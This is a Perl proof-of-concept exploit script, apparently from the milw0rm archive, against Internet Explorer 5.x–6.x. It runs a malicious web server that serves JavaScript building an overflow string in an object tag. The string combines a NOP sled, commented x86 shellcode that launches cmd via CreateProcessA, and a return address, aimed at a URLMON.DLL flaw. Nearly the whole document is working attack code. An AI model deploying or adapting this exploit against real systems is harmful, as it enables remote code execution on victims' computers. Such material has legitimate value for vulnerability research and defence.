84 lines
No EOL
2.1 KiB
Perl
Executable file
84 lines
No EOL
2.1 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
#
|
|
# Proof of concept exploit on IE 5.x - 6.x by Alumni
|
|
# IE-Object longtype dynamic call oferflow
|
|
#
|
|
# url://<$shellcode><'/'x48><jmp %ptr_sh>
|
|
# the flaw actually exists in URLMON.DLL when converting backslashes
|
|
# to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
|
|
#
|
|
# To exploit: i) start server perl script;
|
|
# ii) connect to http-service using IE/5.x.
|
|
# a) the shellcode size is limited up to 56 bytes;
|
|
# b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
|
|
# c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
|
|
#
|
|
|
|
use IO::Socket;
|
|
|
|
$port = 80;
|
|
$server = IO::Socket::INET->new (LocalPort => $port,
|
|
Type =>SOCK_STREAM,
|
|
Reuse => 1,
|
|
Listen => $port) or die("Couldnt't create
|
|
server socket\n");
|
|
|
|
|
|
$shellcode = "\x33\xdb". # xor ebx, ebx
|
|
"\x8b\xd4". # mov edx, esp
|
|
"\x80\xc6\xff". # add dh, 0xFF
|
|
"\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63
|
|
("cmd\x01")
|
|
"\x64\x01". #
|
|
"\x88\x5a\xff". # mov byte ptr[edx-1], bl
|
|
"\x8d\x42\xfc". # lea eax, [edx-4]
|
|
"\x8b\xf5". # mov esi, ebp
|
|
"\x56\x52". # push esi; push edx
|
|
"\x53\x53\x53\x53\x53\x53". # push ebx
|
|
"\x50\x53". # push eax; push ebx
|
|
"\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~=
|
|
CreateProcessA
|
|
"\xff\xd0". # call eax
|
|
"\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~=
|
|
ExitProcess
|
|
"\xff\xd0". # call eax
|
|
"\xcc"; # int 3
|
|
|
|
$nop = "\x90";
|
|
$ret = "\\xAB\\x5D\\x58";
|
|
|
|
|
|
while ($client = $server->accept()) {
|
|
while (<$client>) {
|
|
if ($_ =~ /^(\x0D\x0A)/) {
|
|
|
|
print $client <<END_DATA;
|
|
HTTP/1.0 200 Ok\r
|
|
Content-Type: text/html\r
|
|
\r
|
|
<script>\r
|
|
var mins = 56;\r
|
|
var size = 48;\r
|
|
var sploit = "$shellcode";\r
|
|
var strNop = "$nop";\r
|
|
var strObj = '<object type="';\r
|
|
for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
|
|
strObj += sploit;\r
|
|
for (i=0;i<size;i++) strObj += '/';\r
|
|
strObj += "CCCCCCCCDDDDDDDD";\r
|
|
strObj += "$ret";\r
|
|
strObj += '">Hello</object>';\r
|
|
alert(strObj);\r
|
|
document.write(strObj);\r
|
|
</script>\r
|
|
END_DATA
|
|
close($client);
|
|
|
|
}
|
|
}
|
|
}
|
|
|
|
close($server);
|
|
|
|
# milw0rm.com [2003-06-07] |